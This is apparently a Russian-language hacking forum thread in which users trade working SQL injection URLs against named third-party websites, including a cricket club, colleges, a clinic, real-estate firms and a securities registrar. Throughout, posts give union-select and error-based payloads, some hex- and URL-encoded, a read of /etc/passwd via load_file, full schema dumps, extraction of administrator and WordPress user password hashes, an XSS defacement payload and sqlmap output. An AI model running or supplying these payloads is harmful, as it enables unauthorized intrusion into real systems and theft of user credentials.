Ахах, полчаса делал вывод, Вот что значит нет практики PHP: http://www.indoramaeleme.com/media.php?id=59+u%6eion select 1,2,c%6fnc%61t(0x223c2f7465%37%38%37%34%36%317265613e27273e3c73%36%33%37%326970743e616c6572742822,table%5f%6e%61%6de,0x3e3e,%63%6f%6c%75%6d%6e%5f%6e%61%6d%65,0x22293b3c2f7363726970743e),4,5,6,7,8+%20%66%72%6f%6d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%63%6f%6c%75%6d%6e%73%20%77%68%65%72%65%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29+--+- чтение файлов через hex(load_file(file)) вывод естественно с кодировки, кто сделает норм вывод поделитесь PHP: substring(load_file('/etc/passwd'),0,1)Вот что, открыл я доки , и понял что на русском нету %30 того что есть .
Abu Dhabi Cricket Club Code: http://www.adcricketclub.ae/news_detail.php?newsID=-123+union+select+1,concat(0x3a,user(),database()),3,4,5,6--
Malda College, India Code: http://www.maldacollege.ac.in/current-news.php?id=-35+union+select+1,version(),3,database()--
Code: view-source:http://bw-plast.com/en/news.php?id=-2+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14-- 5.1.73-14.12-log
Code: http://www.severven.ru/base1/readmore.php?id=%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+--+ Code: http://www.severven.ru/base1/readmore.php?id=%27+union+all+select+1,2,3,4,5,(select+concat(@a,0x5B2F44554D505D)+from(select+@a:=0x5B44554D505D,(select+@a+from+information_schema.columns+where+table_schema=database()+and+@a:=concat(@a,table_name,0x09,column_name,0x0A)))a),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+--+ Spoiler: Результат Code: [DUMP]areas id areas name areas image areas styles areas text areas keywords areas del areas published articles id articles navigation articles parent_id articles lft articles rght articles name3 articles text articles published articles styles articles keywords articles image articles del articles dienst articles name basa ID basa name basa titel basa text basa email basa datum basa beschreibung basa a basa b basa c basa d basa e basa f basa g basa h basa i basa k bulgaria_part id bulgaria_part name bulgaria_part image bulgaria_part styles bulgaria_part text bulgaria_part keywords bulgaria_part del bulgaria_part published categories id categories name categories published categories image categories styles categories text categories keywords categories del cityobjects id cityobjects category_id cityobjects user_id cityobjects area_id cityobjects image cityobjects address cityobjects room cityobjects floors cityobjects floor cityobjects floorspace cityobjects totalarea cityobjects costmetr cityobjects totalcost cityobjects commission cityobjects auction cityobjects mortgage cityobjects column cityobjects note cityobjects published cityobjects created cityobjects modified cityobjects vid cityobjects del cityobjects term cityobjects until cityobjects untilroom cityobjects mainfoto cityobjects image2 cityobjects agent cityobjects note2 cityobjects telefon cityobjects operator countries id countries name countries image countries styles countries text countries text2 countries keywords countries del countries published foreignobjects id foreignobjects foreigntype_id foreignobjects user_id foreignobjects country_id foreignobjects address foreignobjects city foreignobjects room foreignobjects floors foreignobjects floor foreignobjects totalarea foreignobjects totalcost foreignobjects rent foreignobjects note foreignobjects published foreignobjects created foreignobjects modified foreignobjects del foreignobjects image2 foreignobjects image3 foreignobjects image4 foreignobjects image5 foreignobjects until foreignobjects untilarea foreignobjects untilroom foreignobjects comment foreignobjects keywords foreignobjects mainfoto foreignobjects about_country foreignobjects bulgaria_part_id foreigntypes id foreigntypes name foreigntypes image foreigntypes styles foreigntypes text foreigntypes keywords foreigntypes del foreigntypes published groups id groups name groups created groups modified images id images image images foreignobject_id posts id posts created posts image posts name posts text posts text2 posts published posts del underground id underground name users id users username users password users first_name users last_name users email users phone users group_id users created users modified users admin users image users del users note users fathername users salt users2 id users2 login users2 password users2 salt [/DUMP] Code: http://www.severven.ru/base1/readmore.php?id=%27+union+all+select+1,2,3,4,5,(select+concat_ws(0x09,username,password,salt,admin)from+users+limit+0,1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+--+ Code: administrator *тут был хеш* 1 Code: http://www.severven.ru/robots.txt PHP: Missing ControllerError: Robots.txtController could not be found.Error: Create the class Robots.txtController below in file: app/controllers/robots.txt_controller.php<?phpclass Robots.txtController extends AppController { var $name = 'Robots.txt';}?>Notice: If you want to customize this error message, create app/views/errors/missing_controller.ctp
Code: view-source:http://mstream.fr/webtv/film.php?id=-1+union+select+1,2,@,4,5,6,7,8,9,10,11+from(select+@:=0x00,(select+@+from+wp_users+where+@:=concat(@,user_login,0x09,user_pass,0x0a)))q
Code: http://www.greenwall.org/recent-news.php?id=-22+union+select+1,2,version(),4,database(),6,7,8,9,10,11,12,13,14,15,16--
Code: http://www.so-toulouse.com/index.php?id=167&act=-68+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+--+
Code: http://mobile-phone-buy.ru/buy_mobile.php?pc=DOOGEE-T5%27+union+all+select+%27%3E%3Cscript%3Ealert("Hacked By extjs")%3C/script%3E%27--+ http://www.casuals.ru/product_info.php/products_id/11164'%20and%20extractvalue(0x00,concat(0x0a,(select%20table_name%20from%20information_schema.tables%20where%20table_name%20like%20'%25user%25'%20limit%203,1)))--%20/category/1
550 тиц Code: http://www.landscrona.ru/tales/index.php?id=-111+union+select+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15,16+--+ 30 тиц Code: http://www.avon-beauty.ru/index.php?show_aux_page=(ExtractValue(1,concat(0x3a,(select(version()))))) 60 тиц Code: http://sejo.ru/index.php?page=119+union+select+1,2,3,4,@@version,6,7,8,9,10,11+--+1 Внизу
Code: view-source:http://www.nesprosta.ru/?type=content&id=29' HTML: <!--SELECT * FROM structure WHERE id like '29''<br>Ошибка БД: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''29''' at line 1--><!--SELECT name,text FROM structure LEFT JOIN content ON structure.id=content.link_id WHERE structure.id=29'<br>Ошибка БД: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1--> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>База данных квартир: купить квартиру в Москве, снять квартиру (Москва), цены на квартиры, объявления недвижимость - Nesprosta.ru</title> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1251"> Code: http://www.trest14perm.ru/newbuildings/?show_id=37+and+1=10+uNion+all+select+1,2,3,4,5,6,7-- HTML: SQL Error: The used SELECT statements have a different number of columns at /home/trest14prm/trest14perm.ru/docs/wbk-cms/module/objects.php line 47<br><pre>Array ( [code] => 1222 [message] => The used SELECT statements have a different number of columns [query] => SELECT DISTINCT * FROM geocard,geomarks WHERE act=1 and geocard.type=geomarks.id and obj1=37 and 1=10 uNion all select 1,2,3,4,5,6,7-- GROUP BY type [context] => /home/trest14prm/trest14perm.ru/docs/wbk-cms/module/objects.php line 47 ) </pre> Code: http://kras-city.ru/info_krsnr.php?num=1%27+union+all+select+1,2,3,4,5,6,7,8,9,10,(select(@)from(select(@:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat(@,0x3c6c693e,table_schema,0x2e,table_name,0x3a,column_name))))a),12--+[ Это как обойти? Code: http://www.meatbranch.com/advert/magazine.html'+and+'1'='1 Code: http://www.teplopoint.ru/'--+[ Code: http://www.zorginox.ru/sobitiya/504/'%20and%20'1'='1
Code: http://an-tarusa.ru/View.aspx?id=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 все равно не знаю, что с этим Jet Database делать
АО «Сибирский реестр» Code: http://www.sibreg.ru/doc.php?id=-13827+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10--&menu=about
Clínica Medilaser Neiva Code: http://www.clinicamedilaser.com.co/branch.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5--
Code: http://www.kupa.pl/pl/humor.php?id=16 Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=16 AND 1103=1103 Type: AND/OR time-based blind Title: MySQL <= 5.0.11 AND time-based blind (heavy query) Payload: id=16 AND 7554=BENCHMARK(5000000,MD5(0x6673754b)) --- web application technology: Apache back-end DBMS: MySQL <= 5.0.11 available databases [1]: [*] baza777
available databases [15]: [*] cursosoxford [*] information_schema [*] moodle [*] mysql [*] oxfordazuero2015 [*] oxfordazuero2016 [*] oxfordazuero2017 [*] oxforddavid2016 [*] oxforddavid2017 [*] oxfordsantiago2015 [*] oxfordsantiago2016 [*] oxfordsantiago2017 [*] performance_schema [*] phpmyadmin [*] temp http://oxfordsantiago.com/index.php...ng_id=68&Itemid=650&establename=massmessaages
Code: http://adamslove.org/en-d.php?id=85 (GET) Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=85' AND 1057=1057 AND 'wZNL'='wZNL
